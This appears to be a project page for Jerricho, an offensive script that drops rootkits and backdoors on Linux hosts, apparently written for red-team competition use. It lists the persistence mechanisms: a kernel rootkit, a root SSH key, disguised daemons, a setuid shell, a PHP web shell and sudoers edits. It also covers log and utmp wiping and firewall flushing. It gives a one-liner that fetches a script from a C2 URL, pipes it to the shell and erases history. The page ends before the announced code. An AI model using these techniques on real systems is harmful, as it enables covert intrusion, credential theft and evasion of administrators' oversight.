Jerricho - a script for deploying simple Linux rootkit and backdoors.

Jerricho – a script for deploying simple Linux rootkit and backdoors.

Jerricho is a simple bourne script that quickly drops several persistence mechanisms on a target Linux host. OS Support : Ubuntu, Centos, Debian, FreeBSD.

– Add a web interface for managing the connections and running commands.
– Automatically pull down passwords from the local systems, store, and sort them accordingly.
– Add a function to check to see if the system is still infected / running the rootkit and backdoors and if not re-execute/re-infect the system.
– Aggregate sniffer logs
– Keeping track of hosts which are still accessible via rootkit
– add bin to sudoers
– clear up logs better (Could probably do a date check when we execute on the system and remove all log lines that are 5 seconds before and 15 seconds after)
– spider and revert sshd_config
– rootkit – specify multiple ports on cmdline
– add iptables -F to all init scripts.
– Change the timestamp of modified files

Usage :
+ You run it as root, it drops a bunch of backdoors in multiple places. This enabled us to easily retain access at regionals for almost all systems.

+ runs stuff out of “/dev/…” and “/dev/ ” (2 spaces) because hiding in plain sight is easy.

+ to run via msf session: sessions -c export HISTFILE=/dev/null; wget -q $C2_URL/scripts/ -O /dev/stdout | /bin/sh – && history -c

Must be change the URL : C2 URL and c2 IPAddress

Must be change the URL :
C2 URL and c2 IPAddress

this creates several ways back in:
1) drops our kernel rootkit which hooks accept() — lets us back in via any listening port, hides processes, etc
2) adds a root ssh key
3) drops our modified trixd00rd (takes params from env vars) as ‘rsyslogd’
4) drops the rooty icmp backdoor as ‘udevd’
5) backdoors the ‘bin’ system account, adds it to sudoers
6) adds a setuid shell in “/dev/ /” for re-elevation from php/bin account if needed
7) drops a basic PHP shell in a couple of likely web roots (http://url/.src.php?e=uptime)
8) adds all likely webserver users to sudoers (www-data, apache, httpd)

– removes all entries from who (removes & re-creates utmp file, we can be selective later)
– optionally installs root a crontab to clear iptables rules every 5m. (uncomment iptables stuff if needed)
– optionally runs a bash script that takes down all services every 10s (teams lose points, also currently disabled)
– adds a secondary pubkey location to sshd_config, sourcing keys from /etc/ssh/authorized_keys as well as the std %h/.ssh dirs.
– We actually had people unknowlingly remove the kernel backdoor through various upgrade and reboot activities, init script changes,etc, only for us to retain access using the web shell, re-elevate via the suid bin and reinstall.

Latest Released v-2.1 Code: